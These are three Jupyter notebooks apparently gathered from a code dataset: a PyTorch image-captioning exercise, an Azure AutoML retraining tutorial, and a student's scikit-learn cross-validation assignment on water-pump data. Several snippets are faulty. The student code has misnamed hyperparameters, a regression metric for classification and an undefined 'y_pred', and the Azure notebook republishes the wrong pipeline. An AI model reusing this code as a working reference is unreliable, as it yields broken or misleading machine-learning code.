In the next code cell we define a `device` that you will use move PyTorch tensors to GPU (if CUDA is available). Run this code cell before continuing.
```
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
```
Run the code cell below to instantiate the CNN encoder in `encoder`.
The pre-processed images from the batch in **Step 2** of this notebook are then passed through the encoder, and the output is stored in `features`.
```
# Specify the dimensionality of the image embedding.
embed_size = 256
#-#-#-# Do NOT modify the code below this line. #-#-#-#
# Initialize the encoder. (Optional: Add additional arguments if necessary.)
encoder = EncoderCNN(embed_size)
# Move the encoder to GPU if CUDA is available.
encoder.to(device)
# Move last batch of images (from Step 2) to GPU if CUDA is available.
images = images.to(device)
# Pass the images through the encoder.
features = encoder(images)
print('type(features):', type(features))
print('features.shape:', features.shape)
# Check that your encoder satisfies some requirements of the project! :D
assert type(features)==torch.Tensor, "Encoder output needs to be a PyTorch Tensor."
assert (features.shape[0]==batch_size) & (features.shape[1]==embed_size), "The shape of the encoder output is incorrect."
```
The encoder that we provide to you uses the pre-trained ResNet-50 architecture (with the final fully-connected layer removed) to extract features from a batch of pre-processed images. The output is then flattened to a vector, before being passed through a `Linear` layer to transform the feature vector to have the same size as the word embedding.

You are welcome (and encouraged) to amend the encoder in **model.py**, to experiment with other architectures. In particular, consider using a [different pre-trained model architecture](http://pytorch.org/docs/master/torchvision/models.html). You may also like to [add batch normalization](http://pytorch.org/docs/master/nn.html#normalization-layers).
> You are **not** required to change anything about the encoder.
For this project, you **must** incorporate a pre-trained CNN into your encoder. Your `EncoderCNN` class must take `embed_size` as an input argument, which will also correspond to the dimensionality of the input to the RNN decoder that you will implement in Step 4. When you train your model in the next notebook in this sequence (**2_Training.ipynb**), you are welcome to tweak the value of `embed_size`.
If you decide to modify the `EncoderCNN` class, save **model.py** and re-execute the code cell above. If the code cell returns an assertion error, then please follow the instructions to modify your code before proceeding. The assert statements ensure that `features` is a PyTorch tensor with shape `[batch_size, embed_size]`.
<a id='step4'></a>
## Step 4: Implement the RNN Decoder
Before executing the next code cell, you must write `__init__` and `forward` methods in the `DecoderRNN` class in **model.py**. (Do **not** write the `sample` method yet - you will work with this method when you reach **3_Inference.ipynb**.)
> The `__init__` and `forward` methods in the `DecoderRNN` class are the only things that you **need** to modify as part of this notebook. You will write more implementations in the notebooks that appear later in the sequence.
Your decoder will be an instance of the `DecoderRNN` class and must accept as input:
- the PyTorch tensor `features` containing the embedded image features (outputted in Step 3, when the last batch of images from Step 2 was passed through `encoder`), along with
- a PyTorch tensor corresponding to the last batch of captions (`captions`) from Step 2.
Note that the way we have written the data loader should simplify your code a bit. In particular, every training batch will contain pre-processed captions where all have the same length (`captions.shape[1]`), so **you do not need to worry about padding**.
> While you are encouraged to implement the decoder described in [this paper](https://arxiv.org/pdf/1411.4555.pdf), you are welcome to implement any architecture of your choosing, as long as it uses at least one RNN layer, with hidden dimension `hidden_size`.
Although you will test the decoder using the last batch that is currently stored in the notebook, your decoder should be written to accept an arbitrary batch (of embedded image features and pre-processed captions [where all captions have the same length]) as input.

In the code cell below, `outputs` should be a PyTorch tensor with size `[batch_size, captions.shape[1], vocab_size]`. Your output should be designed such that `outputs[i,j,k]` contains the model's predicted score, indicating how likely the `j`-th token in the `i`-th caption in the batch is the `k`-th token in the vocabulary. In the next notebook of the sequence (**2_Training.ipynb**), we provide code to supply these scores to the [`torch.nn.CrossEntropyLoss`](http://pytorch.org/docs/master/nn.html#torch.nn.CrossEntropyLoss) optimizer in PyTorch.
```
# Specify the number of features in the hidden state of the RNN decoder.
hidden_size = 512
#-#-#-# Do NOT modify the code below this line. #-#-#-#
# Store the size of the vocabulary.
vocab_size = len(data_loader.dataset.vocab)
# Initialize the decoder.
decoder = DecoderRNN(embed_size, hidden_size, vocab_size)
# Move the decoder to GPU if CUDA is available.
decoder.to(device)
# Move last batch of captions (from Step 1) to GPU if CUDA is available
captions = captions.to(device)
# Pass the encoder output and captions through the decoder.
outputs = decoder(features, captions)
print('type(outputs):', type(outputs))
print('outputs.shape:', outputs.shape)
# Check that your decoder satisfies some requirements of the project! :D
assert type(outputs)==torch.Tensor, "Decoder output needs to be a PyTorch Tensor."
assert (outputs.shape[0]==batch_size) & (outputs.shape[1]==captions.shape[1]) & (outputs.shape[2]==vocab_size), "The shape of the decoder output is incorrect."
```
When you train your model in the next notebook in this sequence (**2_Training.ipynb**), you are welcome to tweak the value of `hidden_size`.
|
github_jupyter
|
# Automated Machine Learning
**Continuous retraining using Pipelines and Time-Series TabularDataset**
## Contents
1. [Introduction](#Introduction)
2. [Setup](#Setup)
3. [Compute](#Compute)
4. [Run Configuration](#Run-Configuration)
5. [Data Ingestion Pipeline](#Data-Ingestion-Pipeline)
6. [Training Pipeline](#Training-Pipeline)
7. [Publish Retraining Pipeline and Schedule](#Publish-Retraining-Pipeline-and-Schedule)
8. [Test Retraining](#Test-Retraining)
## Introduction
In this example we use AutoML and Pipelines to enable contious retraining of a model based on updates to the training dataset. We will create two pipelines, the first one to demonstrate a training dataset that gets updated over time. We leverage time-series capabilities of `TabularDataset` to achieve this. The second pipeline utilizes pipeline `Schedule` to trigger continuous retraining.
Make sure you have executed the [configuration notebook](../../../configuration.ipynb) before running this notebook.
In this notebook you will learn how to:
* Create an Experiment in an existing Workspace.
* Configure AutoML using AutoMLConfig.
* Create data ingestion pipeline to update a time-series based TabularDataset
* Create training pipeline to prepare data, run AutoML, register the model and setup pipeline triggers.
## Setup
As part of the setup you have already created an Azure ML `Workspace` object. For AutoML you will need to create an `Experiment` object, which is a named object in a `Workspace` used to run experiments.
```
import logging
from matplotlib import pyplot as plt
import numpy as np
import pandas as pd
from sklearn import datasets
import azureml.core
from azureml.core.experiment import Experiment
from azureml.core.workspace import Workspace
from azureml.train.automl import AutoMLConfig
```
This sample notebook may use features that are not available in previous versions of the Azure ML SDK.
Accessing the Azure ML workspace requires authentication with Azure.
The default authentication is interactive authentication using the default tenant. Executing the ws = Workspace.from_config() line in the cell below will prompt for authentication the first time that it is run.
If you have multiple Azure tenants, you can specify the tenant by replacing the ws = Workspace.from_config() line in the cell below with the following:
```
from azureml.core.authentication import InteractiveLoginAuthentication
auth = InteractiveLoginAuthentication(tenant_id = 'mytenantid')
ws = Workspace.from_config(auth = auth)
```
If you need to run in an environment where interactive login is not possible, you can use Service Principal authentication by replacing the ws = Workspace.from_config() line in the cell below with the following:
```
from azureml.core.authentication import ServicePrincipalAuthentication
auth = auth = ServicePrincipalAuthentication('mytenantid', 'myappid', 'mypassword')
ws = Workspace.from_config(auth = auth)
```
For more details, see aka.ms/aml-notebook-auth
```
ws = Workspace.from_config()
dstor = ws.get_default_datastore()
# Choose a name for the run history container in the workspace.
experiment_name = "retrain-noaaweather"
experiment = Experiment(ws, experiment_name)
output = {}
output["Subscription ID"] = ws.subscription_id
output["Workspace"] = ws.name
output["Resource Group"] = ws.resource_group
output["Location"] = ws.location
output["Run History Name"] = experiment_name
pd.set_option("display.max_colwidth", -1)
outputDf = pd.DataFrame(data=output, index=[""])
outputDf.T
```
## Compute
#### Create or Attach existing AmlCompute
You will need to create a compute target for your AutoML run. In this tutorial, you create AmlCompute as your training compute resource.
> Note that if you have an AzureML Data Scientist role, you will not have permission to create compute resources. Talk to your workspace or IT admin to create the compute targets described in this section, if they do not already exist.
#### Creation of AmlCompute takes approximately 5 minutes.
If the AmlCompute with that name is already in your workspace this code will skip the creation process.
As with other Azure services, there are limits on certain resources (e.g. AmlCompute) associated with the Azure Machine Learning service. Please read [this article](https://docs.microsoft.com/en-us/azure/machine-learning/service/how-to-manage-quotas) on the default limits and how to request more quota.
```
from azureml.core.compute import ComputeTarget, AmlCompute
from azureml.core.compute_target import ComputeTargetException
# Choose a name for your CPU cluster
amlcompute_cluster_name = "cont-cluster"
# Verify that cluster does not exist already
try:
compute_target = ComputeTarget(workspace=ws, name=amlcompute_cluster_name)
print("Found existing cluster, use it.")
except ComputeTargetException:
compute_config = AmlCompute.provisioning_configuration(
vm_size="STANDARD_DS12_V2", max_nodes=4
)
compute_target = ComputeTarget.create(ws, amlcompute_cluster_name, compute_config)
compute_target.wait_for_completion(show_output=True)
```
## Run Configuration
```
from azureml.core.runconfig import CondaDependencies, RunConfiguration
# create a new RunConfig object
conda_run_config = RunConfiguration(framework="python")
# Set compute target to AmlCompute
conda_run_config.target = compute_target
conda_run_config.environment.docker.enabled = True
cd = CondaDependencies.create(
pip_packages=[
"azureml-sdk[automl]",
"applicationinsights",
"azureml-opendatasets",
"azureml-defaults",
],
conda_packages=["numpy==1.16.2"],
pin_sdk_version=False,
)
conda_run_config.environment.python.conda_dependencies = cd
print("run config is ready")
```
## Data Ingestion Pipeline
For this demo, we will use NOAA weather data from [Azure Open Datasets](https://azure.microsoft.com/services/open-datasets/). You can replace this with your own dataset, or you can skip this pipeline if you already have a time-series based `TabularDataset`.
```
# The name and target column of the Dataset to create
dataset = "NOAA-Weather-DS4"
target_column_name = "temperature"
```
### Upload Data Step
The data ingestion pipeline has a single step with a script to query the latest weather data and upload it to the blob store. During the first run, the script will create and register a time-series based `TabularDataset` with the past one week of weather data. For each subsequent run, the script will create a partition in the blob store by querying NOAA for new weather data since the last modified time of the dataset (`dataset.data_changed_time`) and creating a data.csv file.
```
from azureml.pipeline.core import Pipeline, PipelineParameter
from azureml.pipeline.steps import PythonScriptStep
ds_name = PipelineParameter(name="ds_name", default_value=dataset)
upload_data_step = PythonScriptStep(
script_name="upload_weather_data.py",
allow_reuse=False,
name="upload_weather_data",
arguments=["--ds_name", ds_name],
compute_target=compute_target,
runconfig=conda_run_config,
)
```
### Submit Pipeline Run
```
data_pipeline = Pipeline(
description="pipeline_with_uploaddata", workspace=ws, steps=[upload_data_step]
)
data_pipeline_run = experiment.submit(
data_pipeline, pipeline_parameters={"ds_name": dataset}
)
data_pipeline_run.wait_for_completion(show_output=False)
```
## Training Pipeline
### Prepare Training Data Step
Script to check if new data is available since the model was last trained. If no new data is available, we cancel the remaining pipeline steps. We need to set allow_reuse flag to False to allow the pipeline to run even when inputs don't change. We also need the name of the model to check the time the model was last trained.
```
from azureml.pipeline.core import PipelineData
# The model name with which to register the trained model in the workspace.
model_name = PipelineParameter("model_name", default_value="noaaweatherds")
data_prep_step = PythonScriptStep(
script_name="check_data.py",
allow_reuse=False,
name="check_data",
arguments=["--ds_name", ds_name, "--model_name", model_name],
compute_target=compute_target,
runconfig=conda_run_config,
)
from azureml.core import Dataset
train_ds = Dataset.get_by_name(ws, dataset)
train_ds = train_ds.drop_columns(["partition_date"])
```
### AutoMLStep
Create an AutoMLConfig and a training step.
```
from azureml.train.automl import AutoMLConfig
from azureml.pipeline.steps import AutoMLStep
automl_settings = {
"iteration_timeout_minutes": 10,
"experiment_timeout_hours": 0.25,
"n_cross_validations": 3,
"primary_metric": "r2_score",
"max_concurrent_iterations": 3,
"max_cores_per_iteration": -1,
"verbosity": logging.INFO,
"enable_early_stopping": True,
}
automl_config = AutoMLConfig(
task="regression",
debug_log="automl_errors.log",
path=".",
compute_target=compute_target,
training_data=train_ds,
label_column_name=target_column_name,
**automl_settings,
)
from azureml.pipeline.core import PipelineData, TrainingOutput
metrics_output_name = "metrics_output"
best_model_output_name = "best_model_output"
metrics_data = PipelineData(
name="metrics_data",
datastore=dstor,
pipeline_output_name=metrics_output_name,
training_output=TrainingOutput(type="Metrics"),
)
model_data = PipelineData(
name="model_data",
datastore=dstor,
pipeline_output_name=best_model_output_name,
training_output=TrainingOutput(type="Model"),
)
automl_step = AutoMLStep(
name="automl_module",
automl_config=automl_config,
outputs=[metrics_data, model_data],
allow_reuse=False,
)
```
### Register Model Step
Script to register the model to the workspace.
```
register_model_step = PythonScriptStep(
script_name="register_model.py",
name="register_model",
allow_reuse=False,
arguments=[
"--model_name",
model_name,
"--model_path",
model_data,
"--ds_name",
ds_name,
],
inputs=[model_data],
compute_target=compute_target,
runconfig=conda_run_config,
)
```
### Submit Pipeline Run
```
training_pipeline = Pipeline(
description="training_pipeline",
workspace=ws,
steps=[data_prep_step, automl_step, register_model_step],
)
training_pipeline_run = experiment.submit(
training_pipeline,
pipeline_parameters={"ds_name": dataset, "model_name": "noaaweatherds"},
)
training_pipeline_run.wait_for_completion(show_output=False)
```
### Publish Retraining Pipeline and Schedule
Once we are happy with the pipeline, we can publish the training pipeline to the workspace and create a schedule to trigger on blob change. The schedule polls the blob store where the data is being uploaded and runs the retraining pipeline if there is a data change. A new version of the model will be registered to the workspace once the run is complete.
```
pipeline_name = "Retraining-Pipeline-NOAAWeather"
published_pipeline = training_pipeline.publish(
name=pipeline_name, description="Pipeline that retrains AutoML model"
)
published_pipeline
from azureml.pipeline.core import Schedule
schedule = Schedule.create(
workspace=ws,
name="RetrainingSchedule",
pipeline_parameters={"ds_name": dataset, "model_name": "noaaweatherds"},
pipeline_id=published_pipeline.id,
experiment_name=experiment_name,
datastore=dstor,
wait_for_provisioning=True,
polling_interval=1440,
)
```
## Test Retraining
Here we setup the data ingestion pipeline to run on a schedule, to verify that the retraining pipeline runs as expected.
Note:
* Azure NOAA Weather data is updated daily and retraining will not trigger if there is no new data available.
* Depending on the polling interval set in the schedule, the retraining may take some time trigger after data ingestion pipeline completes.
```
pipeline_name = "DataIngestion-Pipeline-NOAAWeather"
published_pipeline = training_pipeline.publish(
name=pipeline_name, description="Pipeline that updates NOAAWeather Dataset"
)
published_pipeline
from azureml.pipeline.core import Schedule
schedule = Schedule.create(
workspace=ws,
name="RetrainingSchedule-DataIngestion",
pipeline_parameters={"ds_name": dataset},
pipeline_id=published_pipeline.id,
experiment_name=experiment_name,
datastore=dstor,
wait_for_provisioning=True,
polling_interval=1440,
)
```
|
github_jupyter
|
<a href="https://colab.research.google.com/github/pingao2019/DS-Unit-2-Kaggle-Challenge/blob/master/h3Copy_of_LS_DS_223_assignment.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
Lambda School Data Science
*Unit 2, Sprint 2, Module 3*
---
# Cross-Validation
## Assignment
- [ ] [Review requirements for your portfolio project](https://lambdaschool.github.io/ds/unit2), then submit your dataset.
- [ ] Continue to participate in our Kaggle challenge.
- [ ] Use scikit-learn for hyperparameter optimization with RandomizedSearchCV.
- [ ] Submit your predictions to our Kaggle competition. (Go to our Kaggle InClass competition webpage. Use the blue **Submit Predictions** button to upload your CSV file. Or you can use the Kaggle API to submit your predictions.)
- [ ] Commit your notebook to your fork of the GitHub repo.
You won't be able to just copy from the lesson notebook to this assignment.
- Because the lesson was ***regression***, but the assignment is ***classification.***
- Because the lesson used [TargetEncoder](https://contrib.scikit-learn.org/categorical-encoding/targetencoder.html), which doesn't work as-is for _multi-class_ classification.
So you will have to adapt the example, which is good real-world practice.
1. Use a model for classification, such as [RandomForestClassifier](https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.RandomForestClassifier.html)
2. Use hyperparameters that match the classifier, such as `randomforestclassifier__ ...`
3. Use a metric for classification, such as [`scoring='accuracy'`](https://scikit-learn.org/stable/modules/model_evaluation.html#common-cases-predefined-values)
4. If you’re doing a multi-class classification problem — such as whether a waterpump is functional, functional needs repair, or nonfunctional — then use a categorical encoding that works for multi-class classification, such as [OrdinalEncoder](https://contrib.scikit-learn.org/categorical-encoding/ordinal.html) (not [TargetEncoder](https://contrib.scikit-learn.org/categorical-encoding/targetencoder.html))
## Stretch Goals
### Reading
- Jake VanderPlas, [Python Data Science Handbook, Chapter 5.3](https://jakevdp.github.io/PythonDataScienceHandbook/05.03-hyperparameters-and-model-validation.html), Hyperparameters and Model Validation
- Jake VanderPlas, [Statistics for Hackers](https://speakerdeck.com/jakevdp/statistics-for-hackers?slide=107)
- Ron Zacharski, [A Programmer's Guide to Data Mining, Chapter 5](http://guidetodatamining.com/chapter5/), 10-fold cross validation
- Sebastian Raschka, [A Basic Pipeline and Grid Search Setup](https://github.com/rasbt/python-machine-learning-book/blob/master/code/bonus/svm_iris_pipeline_and_gridsearch.ipynb)
- Peter Worcester, [A Comparison of Grid Search and Randomized Search Using Scikit Learn](https://blog.usejournal.com/a-comparison-of-grid-search-and-randomized-search-using-scikit-learn-29823179bc85)
### Doing
- Add your own stretch goals!
- Try other [categorical encodings](https://contrib.scikit-learn.org/categorical-encoding/). See the previous assignment notebook for details.
- In additon to `RandomizedSearchCV`, scikit-learn has [`GridSearchCV`](https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.GridSearchCV.html). Another library called scikit-optimize has [`BayesSearchCV`](https://scikit-optimize.github.io/notebooks/sklearn-gridsearchcv-replacement.html). Experiment with these alternatives.
- _[Introduction to Machine Learning with Python](http://shop.oreilly.com/product/0636920030515.do)_ discusses options for "Grid-Searching Which Model To Use" in Chapter 6:
> You can even go further in combining GridSearchCV and Pipeline: it is also possible to search over the actual steps being performed in the pipeline (say whether to use StandardScaler or MinMaxScaler). This leads to an even bigger search space and should be considered carefully. Trying all possible solutions is usually not a viable machine learning strategy. However, here is an example comparing a RandomForestClassifier and an SVC ...
The example is shown in [the accompanying notebook](https://github.com/amueller/introduction_to_ml_with_python/blob/master/06-algorithm-chains-and-pipelines.ipynb), code cells 35-37. Could you apply this concept to your own pipelines?
### BONUS: Stacking!
Here's some code you can use to "stack" multiple submissions, which is another form of ensembling:
```python
import pandas as pd
# Filenames of your submissions you want to ensemble
files = ['submission-01.csv', 'submission-02.csv', 'submission-03.csv']
target = 'status_group'
submissions = (pd.read_csv(file)[[target]] for file in files)
ensemble = pd.concat(submissions, axis='columns')
majority_vote = ensemble.mode(axis='columns')[0]
sample_submission = pd.read_csv('sample_submission.csv')
submission = sample_submission.copy()
submission[target] = majority_vote
submission.to_csv('my-ultimate-ensemble-submission.csv', index=False)
```
```
%%capture
import sys
# If you're on Colab:
if 'google.colab' in sys.modules:
DATA_PATH = 'https://raw.githubusercontent.com/LambdaSchool/DS-Unit-2-Kaggle-Challenge/master/data/'
!pip install category_encoders==2.*
# If you're working locally:
else:
DATA_PATH = '../data/'
import pandas as pd
# Merge train_features.csv & train_labels.csv
train = pd.merge(pd.read_csv(DATA_PATH+'waterpumps/train_features.csv'),
pd.read_csv(DATA_PATH+'waterpumps/train_labels.csv'))
# Read test_features.csv & sample_submission.csv
test = pd.read_csv(DATA_PATH+'waterpumps/test_features.csv')
sample_submission = pd.read_csv(DATA_PATH+'waterpumps/sample_submission.csv')
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
# Split train into train & val
train, val = train_test_split(train, train_size=0.80, test_size=0.20,
stratify=train['status_group'], random_state=42)
def wrangle(X):
"""Wrangle train, validate, and test sets in the same way"""
# Prevent SettingWithCopyWarning
X = X.copy()
# About 3% of the time, latitude has small values near zero,
# outside Tanzania, so we'll treat these values like zero.
X['latitude'] = X['latitude'].replace(-2e-08, 0)
# When columns have zeros and shouldn't, they are like null values.
# So we will replace the zeros with nulls, and impute missing values later.
# Also create a "missing indicator" column, because the fact that
# values are missing may be a predictive signal.
cols_with_zeros = ['longitude', 'latitude', 'construction_year',
'gps_height', 'population']
for col in cols_with_zeros:
X[col] = X[col].replace(0, np.nan)
X[col+'_MISSING'] = X[col].isnull()
# Drop duplicate columns
duplicates = ['quantity_group', 'payment_type']
X = X.drop(columns=duplicates)
# Drop recorded_by (never varies) and id (always varies, random)
unusable_variance = ['recorded_by', 'id']
X = X.drop(columns=unusable_variance)
# Convert date_recorded to datetime
X['date_recorded'] = pd.to_datetime(X['date_recorded'], infer_datetime_format=True)
# Extract components from date_recorded, then drop the original column
X['year_recorded'] = X['date_recorded'].dt.year
X['month_recorded'] = X['date_recorded'].dt.month
X['day_recorded'] = X['date_recorded'].dt.day
X = X.drop(columns='date_recorded')
# Engineer feature: how many years from construction_year to date_recorded
X['years'] = X['year_recorded'] - X['construction_year']
X['years_MISSING'] = X['years'].isnull()
# return the wrangled dataframe
return X
train = wrangle(train)
val = wrangle(val)
test = wrangle(test)
# The status_group column is the target
target = 'status_group'
# Get a dataframe with all train columns except the target
train_features = train.drop(columns=[target])
# Get a list of the numeric features
numeric_features = train_features.select_dtypes(include='number').columns.tolist()
# Get a series with the cardinality of the nonnumeric features
cardinality = train_features.select_dtypes(exclude='number').nunique()
# Get a list of all categorical features with cardinality <= 50
categorical_features = cardinality[cardinality <= 50].index.tolist()
# Combine the lists
features = numeric_features + categorical_features
# Arrange data into X features matrix and y target vector
X_train = train[features]
y_train = train[target]
X_val = val[features]
y_val = val[target]
X_test = test[features]
```
Use scikit-learn for hyperparameter optimization with RandomizedSearchCV.
```
import category_encoders as ce
import numpy as np
from sklearn.feature_selection import f_regression, SelectKBest
from sklearn.impute import SimpleImputer
from sklearn.linear_model import Ridge
from sklearn.model_selection import cross_val_score
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor
from sklearn.model_selection import GridSearchCV, RandomizedSearchCV
encoder= ce.OneHotEncoder(use_cat_names=True)
x_train_encoded = encoder.fit_transform(X_train)
x_train_encoded.sample(10)
y_train.value_counts()
y_train_encoded = y_train.replace({'functional': 1, 'non functional': 2, 'functional needs repair':3})
y_train_encoded.value_counts()
pipeline = make_pipeline(
StandardScaler(),
SimpleImputer(),
RandomForestClassifier()
)
param_distributions = {
'simpleimputer__strategy': ['mean', 'median'],
'randomforestClassifier__max_depth': [10, 20, 30, 40],
'randomforestClassifier__min_samples_leaf': [1,3,5]
}
search = RandomizedSearchCV(
pipeline,
param_distributions= param_distributions,
n_iter=30,
cv=3,
scoring='neg_mean_absolute_error',
verbose=10,
return_train_score=True,
n_jobs=-1
)
search.fit(x_train_encoded, y_train_encoded);
from sklearn.impute import SimpleImputer
pipeline = make_pipeline(
StandardScaler(),
ce.OneHotEncoder(use_cat_names=True),
SimpleImputer(),
RandomForestClassifier()
)
param_distributions = {
'simpleimputer__strategy': ['mean', 'median'],
'randomforestClassifier__max_depth': [10, 20, 30, 40],
'randomforestClassifier__min_samples_leaf': [1,3,5]
}
search = RandomizedSearchCV(
pipeline,
param_distributions=param_distributions,
n_iter=30,
cv=3,
scoring='neg_mean_absolute_error',
verbose=10,
return_train_score=True,
n_jobs=-1
)
search.fit(X_train, y_train);
from sklearn.metrics import classification_report, accuracy_score, precision_score, confusion_matrix
cv_result = cross_val_score(search,X_train,y_train, scoring = "accuracy")
search.fit(X_train, y_train)
print('Train Accuracy', search.score(X_train, y_train))
print('Validation Accuracy', search.score(X_val, y_val))
submission = test[['id']].copy()
submission['status_group'] = y_pred
submission.to_csv('waterpumps-submission.csv', index=False)
!head 'waterpumps-submission.csv'
```
|
github_jupyter
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.